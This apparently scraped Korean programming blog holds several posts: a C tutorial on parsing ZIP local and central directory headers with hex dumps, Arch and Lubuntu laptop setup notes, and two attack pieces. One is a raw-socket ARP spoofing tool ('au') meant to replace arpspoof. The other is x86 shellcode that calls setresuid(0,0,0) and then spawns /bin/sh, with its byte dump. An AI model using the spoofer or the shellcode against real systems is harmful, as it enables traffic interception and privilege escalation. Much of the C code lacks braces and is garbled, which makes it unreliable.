zip 파일목록 보여주기 프로그램 작성 2번째 

  • 이번에는 Central directory file header를 이용해서 파일 목록을 보여줘보도록하시죠 

  • end of central directory record 구조체 작성
// Zip end of central directory record - Signature = 0x06054b50
struct _zip_end_central_h
    ushort  number;         // Number of this disk
    ushort  start;          // Disk where central directory starts
    ushort  record_cnt;     // Number of central directory records on this disk
    ushort  totoal_record_cnt;  // Total number of central directory records
    ulong   central_size;   // Size of central directory (bytes)
    ulong   offset;         // Offset of start of central directory
    ushort  comment_len;    // ZIP file comment length (n)
} __attribute__((packed));
typedef struct _zip_end_central_h zip_end_central_h;

  • Central directory file header구조체 작성
// Central directory file header -  signature = 0x02014b50
struct _zip_cetral_h
    ushort  ver_m;      // Version made by
    ushort  ver_n;      // Version needed to extract (minimum)
    ushort  flag;       // General purpose bit flag
    ushort  method;     // Compression method
    ushort  time;       // File last modification time
    ushort  date;       // File last modification date
    ulong   crc;        // CRC-32
    ulong   compressed_size;    // Compressed size
    ulong   uncompressed_size;  // Uncompressed size
    ushort  filename_len;       // File name length (n)
    ushort  extra_len;          // Extra field length (m)
    ushort  comment_len;        // File comment length (k)
    ushort  starts;             // Disk number where file starts
    ushort  i_attributes;       // Internal file attributes
    ulong   e_attributes;       // External file attributes
    ulong   relative_offset;    // Relative offset of local file header.
} __attribute__((packed));
typedef struct _zip_cetral_h zip_cetral_h;

  • main 작성
1 // 파일 을 연다.
2 // 파일 위치를 끝으로 이동.
3 // end of central directory records 를 찾을때까지 반복.
5 // 못찾았으면 종료.
6 // 찾았다면 centrol directory file header로 이동한다.
7 // 파일 끝까지 반복한다.
8     // 시그너처를 읽는다.
9     // centrol directory signature 가 아니면
10         // break;
11     // centrol directory 구조체를 읽어들인다.
12     // 파일이름을 읽어들인다.
13     // extra data와 file comment를 읽어들인다.
14     // 파일명과 압축된 파일 용량을 출력한다.
15 // 파일을 닫는다.

  • 완전소스
// zipinfo2.c
// http:://
#include <stdio.h>
#include <stdlib.h>

typedef unsigned short  ushort;
typedef unsigned long   ulong;

// Zip end of central directory record - Signature = 0x06054b50
struct _zip_end_central_h
        ushort  number;                 // Number of this disk
        ushort  start;                  // Disk where central directory starts
        ushort  record_cnt;             // Number of central directory records on this disk
        ushort  totoal_record_cnt;      // Total number of central directory records
        ulong   central_size;   // Size of central directory (bytes)
        ulong   offset;                 // Offset of start of central directory
        ushort  comment_len;    // ZIP file comment length (n)
} __attribute__((packed));
typedef struct _zip_end_central_h zip_end_central_h;

// Central directory file header -  signature = 0x02014b50
struct _zip_cetral_h
        ushort  ver_m;          // Version made by
        ushort  ver_n;          // Version needed to extract (minimum)
        ushort  flag;           // General purpose bit flag
        ushort  method;         // Compression method
        ushort  time;           // File last modification time
        ushort  date;           // File last modification date
        ulong   crc;            // CRC-32
        ulong   compressed_size;        // Compressed size
        ulong   uncompressed_size;      // Uncompressed size
        ushort  filename_len;           // File name length (n)
        ushort  extra_len;                      // Extra field length (m)
        ushort  comment_len;            // File comment length (k)
        ushort  starts;                         // Disk number where file starts
        ushort  i_attributes;           // Internal file attributes
        ulong   e_attributes;           // External file attributes
        ulong   relative_offset;        // Relative offset of local file header.
} __attribute__((packed));
typedef struct _zip_cetral_h zip_cetral_h;

int main()
        // 파일 을 연다.
        FILE *  zip_file = 0;
        zip_file = fopen("""r");
        if(zip_file == 0)
                return 0;

        // end of central directory records를 찾는다.
        ulong   signature = 0;
        long    pos = (long)sizeof(zip_end_central_h) + sizeof(signature);
        fseek(zip_file, -pos, SEEK_END);

        fread(&signature, 1sizeof(signature), zip_file);

        // 못찾았으면 종료.
        if(signature != 0x06054b50)
                fprintf(stderr"not found end of central directory records\n");
                return 0;

        // 찾았다면 centrol directory file header로 이동한다.
        zip_end_central_h       e;
        fread(&e, 1sizeof(zip_end_central_h), zip_file);
        fseek(zip_file, e.offset, SEEK_SET);

        // 파일 끝까지 반복한다.
        int i = 0;
        for(i = 0 ; i < e.totoal_record_cnt ; ++i)
                // 시그너처를 읽는다.
                fread(&signature, 1sizeof(signature), zip_file);

                // centrol directory signature 가 아니면
                if(signature != 0x02014b50)

                // centrol directory 구조체를 읽어들인다.
                zip_cetral_h    c;
                fread(&c, 1sizeof(c), zip_file);

                // 파일이름을 읽어들인다.
                char * filename = (char *)malloc(c.filename_len + 1);
                fread(filename, 1, c.filename_len, zip_file);
                filename[c.filename_len] = 0;

                // extra data와 file comment를 읽어들인다. 그냥 넘긴다.
                fseek(zip_file, c.extra_len, SEEK_CUR);
                fseek(zip_file, c.comment_len, SEEK_CUR);

                // 파일명과 압축된 파일 용량을 출력한다.
                printf("%s\tCompressed size:%u\t Uncompressed size:%u\n",
                                filename, c.compressed_size, c.uncompressed_size);


        // 파일을 닫는다.

        return 0;

  • 결과
$ ./zipinfo2 
aa.txt	Compressed size:16	 Uncompressed size:16
bb.txt	Compressed size:16	 Uncompressed size:16

zip 파일목록 보여주기 프로그램 작성 첫번째

  • zip local file header 구조체 작성

typedef unsigned short  ushort;
typedef unsigned long   ulong;

// Zip Local file header static
struct _zip_localfile_h
    ushort  ver;        // Version needed to extract (minimum)
    ushort  flag;       // General purpose bit flag
    ushort  method;     // Compression method
    ushort  time;       // File last modification time
    ushort  date;       // File last modification date
    ulong   crc;        // CRC-32
    ulong   compressed_size;    // Compressed size
    ulong   uncompressed_size;  // Uncompressed size
    ushort  filename_len;       // File name length (n)
    ushort  extra_len;          // Extra field length (m)
} __attribute__((packed));
typedef struct _zip_localfile_h zip_localfile_h;

  • main 작성

// "" 파일을 연다.
// 파일끝까지 반복한다.
   // 4바이트 시그너처를 읽어들인다.
   // zip local file header 시그너처가 아니면(0x04034b50)
      // break;
   // zip_localfile_h struct를 파일에서 읽어들인다.
   // 파일이름을 읽어들인다.
   // extra field를 읽어들인다.
   // 압축 데이터를 읽어들인다.
   // 파일 이름과 파일 크기등을 화면에 뿌린다.
// 파일을 닫는다.

  • 완전소스

// zipinfo.c
// http:://
#include <stdio.h>
#include <stdlib.h>

typedef unsigned short  ushort;
typedef unsigned long   ulong;

// Zip Local file header static
struct _zip_localfile_h
    ushort  ver;        // Version needed to extract (minimum)
    ushort  flag;       // General purpose bit flag
    ushort  method;     // Compression method
    ushort  time;       // File last modification time
    ushort  date;       // File last modification date
    ulong   crc;        // CRC-32
    ulong   compressed_size;    // Compressed size
    ulong   uncompressed_size;  // Uncompressed size
    ushort  filename_len;       // File name length (n)
    ushort  extra_len;          // Extra field length (m)
} __attribute__((packed));int argc, char * argv[]
typedef struct _zip_localfile_h zip_localfile_h;

// main
int main()

    // "" 파일을 연다.
    FILE *  zip_file = 0;
    zip_file = fopen("""r");
    if(zip_file == 0)
        return 0;

    // 파일끝까지 반복한다.
    while(feof(zip_file) == 0)

        // 4바이트 시그너처를 읽어들인다.
        ulong   signature;
        if(sizeof(signature) !=
                fread(&signature, 1sizeof(signature), zip_file))
            fprintf(stderr,"zip file error\n");

        // zip local file header 시그너처가 아니면(0x04034b50) break;
        if(signature != 0x04034b50)
            printf("signature : %#x\n", signature);

        // zip_localfile_h struct를 파일에서 읽어들인다.
        zip_localfile_h l;
        fread(&l, sizeof(l), 1, zip_file);

        char * filename = (char *)malloc(l.filename_len + 1);
        char * extra = (char *)malloc(l.extra_len);
        char * data = (char *)malloc(l.compressed_size);

        // 파일이름을 읽어들인다.
        fread(filename, 1, l.filename_len, zip_file);
        filename[l.filename_len] = '\0';

        // extra field를 읽어들인다.
        fread(extra, 1, l.extra_len, zip_file);

        // 압축 데이터를 읽어들인다.
        fread(data, 1, l.compressed_size, zip_file);

        // 파일 이름과 파일 크기등을 화면에 뿌린다.
        printf("%s\tCompressed size:%u\t Uncompressed size:%u\n",
                filename, l.compressed_size, l.uncompressed_size);


    // 파일을 닫는다.
    return 0;

  • 결과
$ ./zipinfo 
aa.txt	Compressed size:16	 Uncompressed size:16
bb.txt	Compressed size:16	 Uncompressed size:16
signature : 0x2014b50

ZIP central directory file header 

Offset Bytes Description
0 4 Central directory file header signature = 0x02014b50
4 2 Version made by
6 2 Version needed to extract (minimum)
 8 2 General purpose bit flag
10 2 Compression method
12 2 File last modification time
14 2 File last modification date
16 4 CRC-32
20 4 Compressed size
24 4 Uncompressed size
28 2 File name length (n)
30 2 Extra field length (m)
32 2 File comment length (k)
34 2 Disk number where file starts
36 2 Internal file attributes
38 4 External file attributes
42 4 Relative offset of local file header. This is the number of bytes between
the start of the first disk on which the file occurs, and the start of
the local file header. This allows software reading the central directory
to locate the position of the file inside the ZIP file.
46 n File name
46+n m Extra field
46+n+m k File comment

  • 첫번째 ZIP central directory file header 분석 

$ xxd | grep -A 4 00000a0:
00000a0: 504b 0102 1e03 0a00 0000 0000 5189 093f  PK..........Q..?
00000b0: b537 3c98 1000 0000 1000 0000 0600 1800  .7<.............
00000c0: 0000 0000 0000 0000 a481 0000 0000 6161  ..............aa
00000d0: 2e74 7874 5554 0500 0379 eb40 4e75 780b  .txtUT...y.@Nux.
00000e0: 0001 04e8 0300 0004 6400 0000 504b 0102  ........d...PK..

Offset Bytes Description
0 4 signature = 0x02014b50 504b 0102
4 2 Version made by 1e03
6 2 Version needed to extract (minimum) 0a00
 8 2 General purpose bit flag 0000
10 2 Compression method 0000
12 2 last modification time 5189
14 2 last modification date 093f
16 4 CRC-32 b537 3c98
20 4 Compressed size 1000 0000
24 4 Uncompressed size 1000 0000
28 2 File name length (n) 0600
30 2 Extra field length (m) 1800
32 2 File comment length (k) 0000
34 2 Disk number where file starts 0000
36 2 Internal file attributes 0000
38 4 External file attributes 0000 a481
42 4 Relative offset of local file header 0000 0000
46 n File name 6161 2e74 7874 "aa.txt"
46+n m(0x18) Extra field
5554 0500 0379 eb40 4e75 780b 0001 04e8
0300 0004 6400 0000
46+n+m k(0x0) File comment

  • 두번째 ZIP central directory file header 분석
$ xxd -s 0xec 
00000ec: 504b 0102 1e03 0a00 0000 0000 6089 093f  PK..........`..?
00000fc: b537 3c98 1000 0000 1000 0000 0600 1800  .7<.............
000010c: 0000 0000 0000 0000 a481 5000 0000 6262
000011c: 2e74 7874 5554 0500 0394 eb40 4e75 780b  .txtUT.....@Nux.
000012c: 0001 04e8 0300 0004 6400 0000 504b 0506  ........d...PK..

은 알아서들 해보시고^^ 

ZIP end of central directory record 

Offset Bytes Description
 0 4 End of central directory signature = 0x06054b50
 4 2 Number of this disk
 6 2 Disk where central directory starts
 8 2 Number of central directory records on this disk
10 2 Total number of central directory records
12 4 Size of central directory (bytes)
16 4
20 2 ZIP file comment length (n)
22 n ZIP file comment

  • ZIP end of central directory record 분석 

$ xxd -s 0x138 
0000138: 504b 0506 0000 0000 0200 0200 9800 0000  PK..............
0000148: a000 0000 0000                           ......

Offset Bytes Description
 0 4 Signature = 0x06054b50 504b 0506
 4 2 Number of this disk 0000
 6 2 Disk where central directory starts 0000
 8 2 Number of central directory records on this disk 0200
10 2 Total number of central directory records 0200
12 4 Size of central directory (bytes) 9800 0000
16 4 Offset of start of central directory a000 0000
20 2 ZIP file comment length (n) 0000
22 n ZIP file comment

이제 대략적인 분석은 끝났으므로 다음에는 zip파일을 가지고 프로그래밍 해보시죠.

ZIP local file header 

Local header 는 아래와 같고 [http]위키리스트참고

ZIP local file header
Offset Bytes Description
0 4 Local file header signature = 0x04034b50 (read as a little-endian number)
4 2 Version needed to extract (minimum)
6 2 General purpose bit flag
8 2 Compression method
10 2 File last modification time
12 2 File last modification date
14 4 CRC-32
18 4 Compressed size
22 4 Uncompressed size
26 2 File name length (n)
28 2 Extra field length (m)
30 n File name
30+n m Extra field

위에 나온 것을 보고 분석해봅시다.
$ xxd | head -6
0000000: 504b 0304 0a00 0000 0000 2cb2 093f b537  PK........,..?.7
0000010: 3c98 1000 0000 1000 0000 0600 1c00 6161  <.............aa
0000020: 2e74 7874 5554 0900 0363 3341 4e6a 3341  .txtUT...c3ANj3A
0000030: 4e75 780b 0001 046b 0400 0004 f901 0000  Nux....k........
0000040: 3031 3233 3435 3637 3839 4142 4344 4546  0123456789ABCDEF
0000050: 504b 0304 0a00 0000 0000 2fb2 093f b537  PK......../..?.7

Offset Bytes Description Value
0 4 Local file header signature 504b 0304
4 2 Version needed to extract (minimum) 0a00
6 2 General purpose bit flag 0000
8 2 Compression method 0000
10 2 File last modification time 5189
12 2 File last modification date 093f
14 4 CRC-32 b537 3c98
18 4 Compressed size 1000 0000
22 4 Uncompressed size 1000 0000
26 2 File name length (n) 0600
28 2 Extra field length (m) 1c00
30 n(6) File name 6161 2e74 7874("aa.txt")
30+n m(1c) Extra field(1c == 28byte)
0900 0379 eb40 4e94 eb40 4e75 780b 0001
04e8 0300 0004 6400 0000
30+n+m Data 3031 3233 3435 3637 3839 4142 4344 4546 = "0123456789ABCDEF"


$ xxd |grep -A 5 0000050
0000050: 504b 0304 0a00 0000 0000 6089 093f b537  PK........`..?.7
0000060: 3c98 1000 0000 1000 0000 0600 1c00 6262  <
0000070: 2e74 7874 5554 0900 0394 eb40 4e94 eb40  .txtUT.....@N..@
0000080: 4e75 780b 0001 04e8 0300 0004 6400 0000  Nux.........d...
0000090: 3031 3233 3435 3637 3839 4142 4344 4546  0123456789ABCDEF
00000a0: 504b 0102 1e03 0a00 0000 0000 5189 093f  PK..........Q..?

Offset Bytes Description Value
0 4 Local file header signature 504b 0304
4 2 Version needed to extract (minimum) 0a00
6 2 General purpose bit flag 0000
8 2 Compression method 0000
10 2 File last modification time 6089
12 2 File last modification date 093f
14 4 CRC-32 b537 3c98
18 4 Compressed size 1000 0000
22 4 Uncompressed size 1000 0000
26 2 File name length (n) 0600
28 2 Extra field length (m) 1c00
30 n(6) File name 6262 2e74 7874("bb.txt")
30+n m(1c) Extra field(1c == 28byte)
5554 0900 0394 eb40 4e94 eb40 4e75 780b
0001 04e8 0300 0004 6400 0000
30+n+m Data 3031 3233 3435 3637 3839 4142 4344 4546 = "0123456789ABCDEF"


  • 2개의 파일을 압축한 압축파일을 만들어본다.
  • 압축한 파일을 분석해본다.
  • 분석한 내용을 가지고 분석한 내용을 출력하는 프로그램을 만들어본다. 

분석할 압축파일 작성 

  • 2개의 파일을 압축한 압축파일을 만들어본다.
    파일 첨부 :
# "0123456789ABCDEF"의 내용이 있는 16바이트 텍스트 파일 2개 만들기
$ xxd -r > aa.txt
0000000: 3031 3233 3435 3637 3839 4142 4344 4546  # 화면에 입력할 내용

$ cp aa.txt bb.txt
$ cat aa.txt

$ zip -0 aa.txt bb.txt   # aa.txt, bb.txt 파일을 압축하지 않고 파일로만듬.
  adding: aa.txt (stored 0%)
  adding: bb.txt (stored 0%)

$ ls -l
-rw-r--r-- 1 fehead member  16  89 22:17 aa.txt
-rw-r--r-- 1 fehead member  16  89 22:17 bb.txt0
-rw-r--r-- 1 fehead member 334  89 22:21

  • 압축한 파일 내용물 확인E
$ xxd
0000000: 504b 0304 0a00 0000 0000 2cb2 093f b537  PK........,..?.7
0000010: 3c98 1000 0000 1000 0000 0600 1c00 6161  <.............aa
0000020: 2e74 7874 5554 0900 0363 3341 4e6a 3341  .txtUT...c3ANj3A
0000030: 4e75 780b 0001 046b 0400 0004 f901 0000  Nux....k........

0000040: 3031 3233 3435 3637 3839 4142 4344 4546  0123456789ABCDEF
0000050: 504b 0304 0a00 0000 0000 2fb2 093f b537  PK......../..?.7
0000060: 3c98 1000 0000 1000 0000 0600 1c00 6262  <
0000070: 2e74 7874 5554 0900 036a 3341 4e6a 3341  .txtUT...j3ANj3A
0000080: 4e75 780b 0001 046b 0400 0004 f901 0000  Nux....k........
0000090: 3031 3233 3435 3637 3839 4142 4344 4546  0123456789ABCDEF
00000a0: 504b 0102 1e03 0a00 0000 0000 2cb2 093f  PK..........,..?
00000b0: b537 3c98 1000 0000 1000 0000 0600 1800  .7<.............
00000c0: 0000 0000 0000 0000 a481 0000 0000 6161  ..............aa
00000d0: 2e74 7874 5554 0500 0363 3341 4e75 780b  .txtUT...c3ANux.
00000e0: 0001 046b 0400 0004 f901 0000 504b 0102  ...k........PK..
00000f0: 1e03 0a00 0000 0000 2fb2 093f b537 3c98  ......../..?.7<.
0000100: 1000 0000 1000 0000 0600 1800 0000 0000  ................
0000110: 0000 0000 a481 5000 0000 6262 2e74 7874
0000120: 5554 0500 036a 3341 4e75 780b 0001 046b  UT...j3ANux....k
0000130: 0400 0004 f901 0000 504b 0506 0000 0000  ........PK......
0000140: 0200 0200 9800 0000 a000 0000 0000       ..............

이것을 가지고 분석해보자

먼저 zip file format 형태는 아래와 같습니다. [http]위키리스트참고

다음편에 계속...
파일 첨부함.

arpspoof가  libnet과 libpcap이 필요해서 그냥 한번 raw socket으로만으로 되게 만들어봤습니다.

  au [-r] -i <ethernet interface> -t <target ip> <source ip>

  exam) au -i eth0 : ARP REQUEST
        au -r -i eth0 : ARP REPLY

// au.c
// gcc -o au au.c
// auther :
#include <stdio.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>// struct sockaddr_ll
#include <sys/ioctl.h>		// struct ifreq
#include <strings.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <signal.h>

typedef unsigned char	uchar;
typedef unsigned short	ushort;

// ethernet frame header.
struct eth_hdr
	uchar	h_dest[6];				// destination ether addr
	uchar	h_source[6];			// source ether addr
	ushort	h_proto;				// packet type ID field
} __attribute__((packed));

static const int ETHERNET_SIZE = sizeof(struct eth_hdr);

// ARP header
struct arp_hdr
	ushort	ar_hrd;		// Hardware type : ethernet
	ushort	ar_pro;     // Protocol		 : IP
	uchar	ar_hln;     // Hardware size
	uchar	ar_pln;     // Protocal size
	ushort	ar_op;      // Opcode replay
	uchar	ar_sha[6];  // Sender MAC
	uchar	ar_sip[4];  // Sender IP
	uchar	ar_tha[6];  // Target mac
	uchar	ar_tip[4];  // Target IP
} __attribute__((packed));

static const int ARP_SIZE = sizeof(struct arp_hdr);

static uchar g_buf[sizeof(struct eth_hdr)+sizeof(struct arp_hdr)];
static const char * g_source_ip = NULL;
static const char * g_interface = NULL;
static int g_sock = -1;

// dumps raw memory in hex byte and printable split format
void dump(const uchar *data_buffer, const unsigned int length) {
	uchar byte;
	unsigned int i, j;
	for(i=0; i < length; i++) {
		byte = data_buffer[i];
		printf("%02x ", data_buffer[i]);  // display byte in hex
		if(((i%16)==15) || (i==length-1)) {
			for(j=0; j < 15-(i%16); j++)
				printf("   ");
			printf("| ");
			for(j=(i-(i%16)); j <= i; j++) {  // display printable bytes from line
				byte = data_buffer[j];
				if((byte > 31) && (byte < 127)) // outside printable char range
					printf("%c", byte);
			printf("\n"); // end of the dump line (each line 16 bytes)
		} // end if
	} // end for

// get interface mac addr.
//  exam) interface2mac("eth0", buf);
// return : 1 success
//        : 0 failure
int interface2mac(const char * interface, uchar * mac)
	int fd = socket(PF_INET, SOCK_STREAM, 0);
	if(fd == -1)
		return 0;

	struct ifreq iflist;
	bzero(&iflist, sizeof(iflist));
	strncpy(iflist.ifr_name, interface, sizeof(iflist.ifr_name));
	if(ioctl(fd, SIOCGIFHWADDR, &iflist) == -1)
		perror("ioctl failed");
		return 0;
	struct sockaddr * sa = &iflist.ifr_hwaddr;
	memcpy(mac, sa->sa_data, 6);


#ifdef _DEBUG
	printf("interface2mac: %s\n", interface);
	dump(mac, 6);
#endif // _DEBUG
	return 1;

// get mac address to arp cash.
//  exam) get_arp_to_arpcash(ip)
// return : 1 success
//        : 0 failure
int get_arp_to_arpcash(unsigned long ip)
	int fd = 0;
	if((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0)
		return 0;

	struct sockaddr_in sin;
	bzero(&sin, sizeof(sin));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = ip;
	sin.sin_port = htons(67);

	int i = sendto(fd, NULL, 0, 0, (struct sockaddr *)&sin, sizeof(sin));


	return (i == 0);

// get MAC address from ip, interface
//  exam) arp_cash_lookup("eth0", ip, buf)
// return : 1 success
//        : 0 failure
int arp_cash_lookup(const char * interface, unsigned long ip, uchar * mac)
	int sock = 0;
	struct arpreq	ar;
	struct sockaddr_in * sin = 0;

	bzero(&ar, sizeof(ar));

	strncpy(ar.arp_dev, interface, sizeof(ar.arp_dev));
	sin = (struct sockaddr_in *)&ar.arp_pa;
	sin->sin_family = AF_INET;
	sin->sin_addr.s_addr = ip;

	if((sock = socket(AF_INET, SOCK_DGRAM, 0)) == -1)
		return 0;

	if(ioctl(sock, SIOCGARP, (caddr_t)&ar) == -1)
		return 0;
	memcpy(mac, ar.arp_ha.sa_data, 6);

	return 1;

// string to mac address
//  exam) "01:02:03:0d:0e:0f" --> "\x01\x02\0x03\x0d\x0e\x0f"
// return : 1 success
//        : 0 failure
int str2mac(const char * str_mac, uchar * mac)
	int ret = sscanf(str_mac, "%hhx:%hhx:%hhx:%hhx:%hhx:%hhx",
			&mac[0], &mac[1], &mac[2],
			&mac[3], &mac[4], &mac[5]);

#ifdef _DEBUG
	int i = 0;
	printf("MAC : ");
	for(i = 0 ; i < 6 ; ++i)
		printf("%hhx:", mac[i]);

#endif // _DEBUG

	return ret;

// string to ip.
//  exam) "" --> "\xc0\xa8\x00\x01"
// return : 1 success
//        : 0 failure
int str2ip(const char * str_ip, uchar * ip)
	int ret = sscanf(str_ip, "%hhu.%hhu.%hhu.%hhu",
			&ip[0], &ip[1], &ip[2], &ip[3]);

#ifdef _DEBUG
	int i = 0;
	printf("IP : ");
	for(i = 0 ; i < 4 ; ++i)
		printf("%hhu.", ip[i]);
#endif // _DEBUG
	return ret;

// convert ip to mac address
//  exam) ip2mac("eth0", "", buf);
// return : 1 success
//        : 0 failure
int ip2mac(const char * intf, const char * str_ip, uchar * mac)
	int i = 0;
	unsigned int ip = 0;
	if(str2ip(str_ip, (uchar *)&ip) == 0)
		return 0;

		if(arp_cash_lookup(intf, ip, mac) == 1)
#ifdef _DEBUG
			printf("ip2mac: %s\n", str_ip);
			dump(mac, 6);
#endif // _DEBUG
			return 1;

	while(i++ < 3);

	return 0;

// init arp packet.
void init_packet(struct eth_hdr * e, struct arp_hdr * a, int reply)
	bzero(e, sizeof(*e));
	memset(e->h_dest, 0xff, sizeof(e->h_dest));
	e->h_proto = htons(0x0806);	// ARP protocol

	bzero(a, sizeof(*a));
	a->ar_hrd = htons(0x0001);	// Ethernet 10/100Mbps.
	a->ar_pro = htons(0x0800);	// IP protocol
	a->ar_hln = 6;				// hardware len
	a->ar_pln = 4;				// protocol len

	if(reply == 1)
		a->ar_op = htons(0x0002);	// 1 :request, 2 :reply
		a->ar_op = htons(0x0001);	// 1 :request, 2 :reply

#ifdef _DEBUG
	printf("init_packet Ethernet Header:\n");
	dump((uchar *)e, sizeof(*e));

	printf("init_packet ARP Header:\n");
	dump((uchar *)a, sizeof(*a));
#endif // _DEBUG

// create rawsocket.
//  exam) rawsocket("eth0")
// return -1 : failure.
//        0 <= : success.
int rawsocket(const char * interface)
	int fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
	if(fd == -1)
		perror("socket create:");
		return -1;

	struct ifreq ifr;
	bzero(&ifr, sizeof(ifr));

	// select network interface ex) "eth0"
	strcpy((char *)ifr.ifr_name, interface);
	if(ioctl(fd, SIOCGIFINDEX, &ifr) == -1)
		perror("error getting interface index\n");
		return -1;

	struct sockaddr_ll	sll;

	bzero(&sll, sizeof(sll));
	sll.sll_family = AF_PACKET;
	sll.sll_ifindex = ifr.ifr_ifindex;
	sll.sll_protocol = htons(ETH_P_ALL);

	if(bind(fd, (struct sockaddr*)&sll, sizeof(sll)) == -1)
		perror("Error binding raw socket to interface\n");
		return -1;

	return fd;

void sig_cleanup(int signo)
	printf("clean up\n");

	struct eth_hdr * ether = (struct eth_hdr *)g_buf;
	struct arp_hdr * arp = (struct arp_hdr *)(g_buf+ETHERNET_SIZE);

	uchar source_mac[6] = { 0, };
	if(g_sock != -1 && ip2mac(g_interface, g_source_ip, source_mac) == 1)
		// set source mac to original mac address
		memcpy(ether->h_source, source_mac, 6);
		memcpy(arp->ar_sha, source_mac, 6);
		int i = 0;
		for(i = 0 ; i < 3 ; ++i)
			write(g_sock, g_buf, ETHERNET_SIZE+ARP_SIZE);



void usage()
	printf( "au [-r] -i <ethernet interface> -t <target ip> <source ip>\n"
			"  exam) au -i eth0 : ARP REQUEST\n"
			"        au -r -i eth0 : ARP REPLY\n");

// au -i eth0 -t
int main(int argc, char * argv[])
	const char * target_ip = NULL;
	int			reply = 0;			// ARP reply

	g_interface = "eth0";
	int c = 0;
	while((c = getopt(argc, argv, "ri:t:")) != -1)
		case 'i':
			g_interface = optarg;
		case 't':
			target_ip = optarg;
		case 'r':	// ARP REPLY
			reply = 1;

	argc -= optind;
	argv += optind;

	if(argc != 1)

	g_source_ip = argv[0];
	bzero(g_buf, sizeof(g_buf));

	struct eth_hdr * ether = (struct eth_hdr *)g_buf;
	struct arp_hdr * arp = (struct arp_hdr *)(g_buf+ETHERNET_SIZE);

	init_packet(ether, arp, reply);

	if(interface2mac(g_interface, ether->h_source) == 0 ||
			ip2mac(g_interface, target_ip, ether->h_dest) == 0 ||
			str2ip(g_source_ip, arp->ar_sip) == 0 ||
			str2ip(target_ip, arp->ar_tip) == 0)

		// ether->h_source == my mac		OK
		// ether->h_dest == target mac		OK
		// arp->ar_sha == my mac
		memcpy(arp->ar_sha, ether->h_source, sizeof(arp->ar_sha));

		// arp->ar_sip == source ip		OK
		// arp->ar_tha == target mac
		memcpy(arp->ar_tha, ether->h_dest, sizeof(arp->ar_tha));

		// arp->ar_tip == target ip			OK
		// ether->h_source == my mac		OK
		// ether->h_dest == "\xff\xff\xff\xff\xff\xff"
		memset(ether->h_dest, 0xff, 6);

		// arp->ar_sha == my mac
		memcpy(arp->ar_sha, ether->h_source, sizeof(arp->ar_sha));

		// arp->ar_sip == my ip				OK source ip is my ip
		// arp->ar_tha == "\x00\x00\x00\x00\x00\x00"
		memset(arp->ar_tha, 0, 6);
		// arp->ar_tip == target ip			OK

		signal(SIGINT, &sig_cleanup);

#ifdef _DEBUG
	printf("Ethernet Header:\n");
	dump((uchar *)ether, sizeof(*ether));

	printf("ARP Header:\n");
	dump((uchar *)arp, sizeof(*arp));
#endif // _DEBUG

	// create rawsocket
	g_sock = rawsocket(g_interface);
	if(g_sock == -1)
		return 1;

		putchar('.'); fflush(stdout);
		if(write(g_sock, g_buf, ETHERNET_SIZE+ARP_SIZE) < 1)

		if(reply != 1)



	return 0;

노트북에는 아치리눅스가 짱인듯 싶네요.
일단 보통 리눅스(우분투, 데비얀)들 처럼 구형 386PC에 최적화된 배포판이 아닌 펜티엄 프로(i686) 이상급에 최적화된 배포판입니다. 그리고 군더더기가 전혀 없습니다.

단점으로는 초보가 설치하기가 어렵다는 단점이 있습니다.

노트북에 설치한것을 그냥 써놓습니다.
1. 아치 리눅스를 설치한다.

2. X윈도우, lxde 메니저 설치.
 $ pacman -S xorg-xinit
 $ pacman -S lxde leafpad xarchiver obconf epdfview
 $ mkdir -p  ~/.config/openbox
 $ cp /etc/xdg/openbox/* ~/.config/openbox
$ vi .xinitrc
export LANG=ko_KR.UTF-8
export XIM="nabi"
export XIM_PROGRAM="/usr/bin/nabi"
export XIM_ARGS=
export GTK_IM_MODULE="xim"
export XMODIFIERS="@im=nabi"
exec ck-launch-session startlxde

3. 한글 설정
yaout 설치 참고

# 폰트및 입력기 설치
$ yaout -S nabi ttf-alee ttf-nanum ttf-nanumgothic_coding

4. network메니저 설치
$ pacman -S networkmanager network-manager-applet

5. 노트북 툴 설치
$ pacman -S laptop-mode-tools

6. usb 드라이브 auto mount
 $ pacman -S hal ntfs-3g

7. 데몬 자동으로 뜨게 하기
$ vi /etc/rc.conf
# DAEMONS DAEMONS=(hwclock syslog-ng network netfs crond dbus hal @alsa laptop-init @laptop-mode networkmanager)
8. 완료.

가볍게 돌아가는 리눅스를 설치할려면 먼저
1. 우분투 계열인 Lubuntu를 설치한다.

2. 팬소리를 최소화로 조용하게 사용할려면( 단 속도는 좀 느려진다)
 $ sudo apt-get install sysfsutils cpufrequtils
 $ sudo vi /etc/sysfs.conf
devices/system/cpu/cpu0/cpufreq/scaling_governor = powersave
devices/system/cpu/cpu1/cpufreq/scaling_governor = powersave 

$ sudo /etc/init.d/sysfsutils restart

추가) 우분투보다는 아치리눅스가 더 가볍고 빠르더군요. 여기를 참고 하세요.

$ cat priv_shell.s
global _start

;setresuid(uid_t ruid, uid_t euid, uid_t suid)
xor ebx, ebx  ; root ruid = 0
xor ecx, ecx  ; root euid = 0
xor edx, edx ; root suid = 0
xor eax, eax
mov al, 0xa4 ; setresuid call number = 0xa4(164)
int 0x80

;int execve(const char * filename, char * const argv[], char * const envp[])
; execve("/bin//sh", ["/bin//sh", 0x0], [ 0x0 ]);

xor eax, eax  ; eax = 0
push eax
push '//sh'
push '/bin'   ; "/bin//sh", 0x0

mov ebx, esp  ; const char * filename = "/bin//sh", 0x0
push eax
mov edx, esp  ; char * const envp[] = [ 0 ]
push ebx
mov ecx, esp  ; char * const argv[] = [ "/bin//sh", 0 ]
mov al, 11
int 0x80

$ xxd priv_shell
0000000: 31db 31c9 31d2 31c0 b0a4 cd80 31c0 5068
0000010: 2f2f 7368 682f 6269 6e89 e350 89e2 5389  //shh/bin..P..S.
0000020: e1b0 0bcd 80                             .....

$ cat tiny_shell.s
global _start

;int execve(const char * filename, char * const argv[], char * const envp[])
; execve("/bin//sh", ["/bin//sh", 0x0], [ 0x0 ]);

xor eax, eax  ; eax = 0
push eax
push '//sh'
push '/bin'   ; "/bin//sh", 0x0

mov ebx, esp  ; const char * filename = "/bin//sh", 0x0
push eax
mov edx, esp  ; char * const envp[] = [ 0 ]
push ebx
